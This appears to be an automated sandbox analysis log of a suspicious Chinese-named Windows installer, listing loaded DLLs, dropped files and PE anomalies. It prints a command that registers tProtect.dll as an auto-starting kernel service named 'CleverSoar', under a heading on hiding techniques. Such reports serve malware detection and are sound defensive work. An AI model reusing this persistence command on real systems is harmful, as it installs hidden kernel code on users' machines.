Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeStatic file information: File size 9026305 > 1048576
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2164014609.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2163901201.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_005E57D0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeStatic PE information: real checksum: 0x0 should be: 0x89f7e2
Source: update.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: update.vbc.2.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x3436dd
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x3436dd
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.drStatic PE information: section name: .didata
Source: update.vbc.2.drStatic PE information: section name: .00cfg
Source: update.vbc.2.drStatic PE information: section name: .voltbl
Source: update.vbc.2.drStatic PE information: section name: .aQ#
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ#
Source: update.vbc.6.drStatic PE information: section name: .00cfg
Source: update.vbc.6.drStatic PE information: section name: .voltbl
Source: update.vbc.6.drStatic PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB6BDDB push ecx; ret 6_2_6CB6BDEE
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CA10F00 push ss; retn 0001h6_2_6CA10F0A
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB9E9F4 push 004AC35Ch; ret 6_2_6CB9EA0E
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CC3A290 push eax; ret 6_2_6CC3A2BE
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CC39F10 push eax; ret 6_2_6CC39F2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005645F4 push 0060C35Ch; ret 9_2_0056460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005FFB10 push eax; ret 9_2_005FFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005FFE90 push eax; ret 9_2_005FFEBE
Source: update.vbc.2.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: update.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
